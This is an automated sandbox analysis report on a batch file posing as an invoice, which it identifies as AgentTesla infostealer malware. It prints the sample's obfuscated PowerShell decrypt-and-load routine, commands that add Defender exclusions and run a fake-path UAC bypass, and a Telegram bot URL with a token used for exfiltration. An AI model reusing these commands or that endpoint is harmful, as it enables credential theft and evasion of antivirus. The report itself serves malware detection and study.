Analysis
-
max time kernel
91s -
max time network
108s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
04-06-2024 01:39
Static task
static1
Behavioral task
behavioral1
Sample
INVOICE07.bat
Resource
win7-20240215-en
General
-
Target
INVOICE07.bat
-
Size
540KB
-
MD5
1952a79579272db52a814baf57821f90
-
SHA1
3fcfb6c3d2c08e840d758e905c2f304ec39ca9f3
-
SHA256
e575145995f725fbaecc1b95c73ec0fbdad3117e1f492dc8d93ad076f5ad2da1
-
SHA512
088de9db26c4eda94bb71a5379118418c06bcb46d8ccce7d1da2719c8d742e8347a4dfde9f73afbb362ef461a0af159408d9150adc8653f6e5a3507408eb6a93
-
SSDEEP
12288:xToPjPt8r1cxIMTOQo5Xq4PpsXis9Jhqd8FJVqzT+53xH:xeWrOa4UaYpsXlJIdwSIZ
Malware Config
Extracted
agenttesla
https://api.telegram.org/bot7135973864:AAGVqtrGeLysm0FYcz68sQIn3nL2a6CxjMc/
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect packed .NET executables. Mostly AgentTeslaV4. 1 IoCs
Processes:
resource yara_rule behavioral2/memory/396-70-0x000001B666090000-0x000001B6660D2000-memory.dmp INDICATOR_EXE_Packed_GEN01 -
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 1 IoCs
Processes:
resource yara_rule behavioral2/memory/396-70-0x000001B666090000-0x000001B6660D2000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers -
Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 1 IoCs
Processes:
resource yara_rule behavioral2/memory/396-70-0x000001B666090000-0x000001B6660D2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL -
Detects executables referencing Windows vault credential objects. Observed in infostealers 1 IoCs
Processes:
resource yara_rule behavioral2/memory/396-70-0x000001B666090000-0x000001B6660D2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID -
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 1 IoCs
Processes:
resource yara_rule behavioral2/memory/396-70-0x000001B666090000-0x000001B6660D2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store -
Detects executables referencing many email and collaboration clients. Observed in information stealers 1 IoCs
Processes:
resource yara_rule behavioral2/memory/396-70-0x000001B666090000-0x000001B6660D2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients -
Detects executables referencing many file transfer clients. Observed in information stealers 1 IoCs
Processes:
resource yara_rule behavioral2/memory/396-70-0x000001B666090000-0x000001B6660D2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 16 396 powershell.exe 19 396 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 1528 powershell.exe 396 powershell.exe 1560 powershell.exe 3932 powershell.exe 1852 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
ComputerDefaults.exepid Process 4256 ComputerDefaults.exe -
Loads dropped DLL 1 IoCs
Processes:
ComputerDefaults.exepid Process 4256 ComputerDefaults.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 15 api.ipify.org 16 api.ipify.org 17 ip-api.com -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 1528 powershell.exe 1528 powershell.exe 3932 powershell.exe 3932 powershell.exe 396 powershell.exe 396 powershell.exe 1852 powershell.exe 1852 powershell.exe 1852 powershell.exe 1560 powershell.exe 1560 powershell.exe 396 powershell.exe 396 powershell.exe 396 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 3932 powershell.exe Token: SeDebugPrivilege 396 powershell.exe Token: SeDebugPrivilege 1852 powershell.exe Token: SeDebugPrivilege 1560 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
cmd.exepowershell.execmd.exeComputerDefaults.execmd.exepowershell.exedescription pid Process procid_target PID 1324 wrote to memory of 3780 1324 cmd.exe 83 PID 1324 wrote to memory of 3780 1324 cmd.exe 83 PID 1324 wrote to memory of 4712 1324 cmd.exe 85 PID 1324 wrote to memory of 4712 1324 cmd.exe 85 PID 1324 wrote to memory of 1528 1324 cmd.exe 86 PID 1324 wrote to memory of 1528 1324 cmd.exe 86 PID 1528 wrote to memory of 3932 1528 powershell.exe 90 PID 1528 wrote to memory of 3932 1528 powershell.exe 90 PID 1528 wrote to memory of 4072 1528 powershell.exe 94 PID 1528 wrote to memory of 4072 1528 powershell.exe 94 PID 4072 wrote to memory of 4256 4072 cmd.exe 96 PID 4072 wrote to memory of 4256 4072 cmd.exe 96 PID 4256 wrote to memory of 636 4256 ComputerDefaults.exe 97 PID 4256 wrote to memory of 636 4256 ComputerDefaults.exe 97 PID 636 wrote to memory of 4844 636 cmd.exe 99 PID 636 wrote to memory of 4844 636 cmd.exe 99 PID 636 wrote to memory of 4508 636 cmd.exe 100 PID 636 wrote to memory of 4508 636 cmd.exe 100 PID 636 wrote to memory of 396 636 cmd.exe 101 PID 636 wrote to memory of 396 636 cmd.exe 101 PID 396 wrote to memory of 1852 396 powershell.exe 104 PID 396 wrote to memory of 1852 396 powershell.exe 104 PID 396 wrote to memory of 1560 396 powershell.exe 106 PID 396 wrote to memory of 1560 396 powershell.exe 106
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\INVOICE07.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵PID:3780
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YFEk7bCybDCwVf0wTlX8N4pDcP2M+6VJEGXybuh+8wc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ppkRkLHGStauzXAtFwrtog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWVPe=New-Object System.IO.MemoryStream(,$param_var); $VqYlz=New-Object System.IO.MemoryStream; $hGmEI=New-Object System.IO.Compression.GZipStream($VWVPe, [IO.Compression.CompressionMode]::Decompress); $hGmEI.CopyTo($VqYlz); $hGmEI.Dispose(); $VWVPe.Dispose(); $VqYlz.Dispose(); $VqYlz.ToArray();}function execute_function($param_var,$param2_var){ $NuRNy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Lqnnw=$NuRNy.EntryPoint; $Lqnnw.Invoke($null, $param2_var);}$ITxqM = 'C:\Users\Admin\AppData\Local\Temp\INVOICE07.bat';$host.UI.RawUI.WindowTitle = $ITxqM;$NFyDa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ITxqM).Split([Environment]::NewLine);foreach ($RWjHW in $NFyDa) { if ($RWjHW.StartsWith('beDrwtSuNzbegooyjSZN')) { $bpNTb=$RWjHW.Substring(20); break; }}$payloads_var=[string[]]$bpNTb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:4712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c call SC.cmd5⤵
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"6⤵PID:4844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YFEk7bCybDCwVf0wTlX8N4pDcP2M+6VJEGXybuh+8wc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ppkRkLHGStauzXAtFwrtog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWVPe=New-Object System.IO.MemoryStream(,$param_var); $VqYlz=New-Object System.IO.MemoryStream; $hGmEI=New-Object System.IO.Compression.GZipStream($VWVPe, [IO.Compression.CompressionMode]::Decompress); $hGmEI.CopyTo($VqYlz); $hGmEI.Dispose(); $VWVPe.Dispose(); $VqYlz.Dispose(); $VqYlz.ToArray();}function execute_function($param_var,$param2_var){ $NuRNy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Lqnnw=$NuRNy.EntryPoint; $Lqnnw.Invoke($null, $param2_var);}$ITxqM = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $ITxqM;$NFyDa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ITxqM).Split([Environment]::NewLine);foreach ($RWjHW in $NFyDa) { if ($RWjHW.StartsWith('beDrwtSuNzbegooyjSZN')) { $bpNTb=$RWjHW.Substring(20); break; }}$payloads_var=[string[]]$bpNTb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:4508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5bd5940f08d0be56e65e5f2aaf47c538e
SHA1d7e31b87866e5e383ab5499da64aba50f03e8443
SHA2562d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
SHA512c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406
-
Filesize
944B
MD5ba169f4dcbbf147fe78ef0061a95e83b
SHA192a571a6eef49fff666e0f62a3545bcd1cdcda67
SHA2565ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
SHA5128d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c
-
Filesize
540KB
MD51952a79579272db52a814baf57821f90
SHA13fcfb6c3d2c08e840d758e905c2f304ec39ca9f3
SHA256e575145995f725fbaecc1b95c73ec0fbdad3117e1f492dc8d93ad076f5ad2da1
SHA512088de9db26c4eda94bb71a5379118418c06bcb46d8ccce7d1da2719c8d742e8347a4dfde9f73afbb362ef461a0af159408d9150adc8653f6e5a3507408eb6a93
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
80KB
MD5d25a9e160e3b74ef2242023726f15416
SHA127a9bb9d7628d442f9b5cf47711c906e3315755b
SHA2567b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c
SHA512bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910
-
Filesize
122KB
MD5e286ada1af4b08fa4b7c78f862883c4e
SHA1798ebc7b7cd3db667f1a59ade299be4cff397f39
SHA25616eb71b68025711fdbc93229fde22ecc73dc8a23be8b40700772b96978187ea3
SHA512fbbbc893388a39e94d8b2265aef75dbaf5fd928fadabd3dbfc5cbee64b600de0102b82e5d2b5c56efe128b45f6ddd4bba2668194c05decdfa78c8e7e382de3f5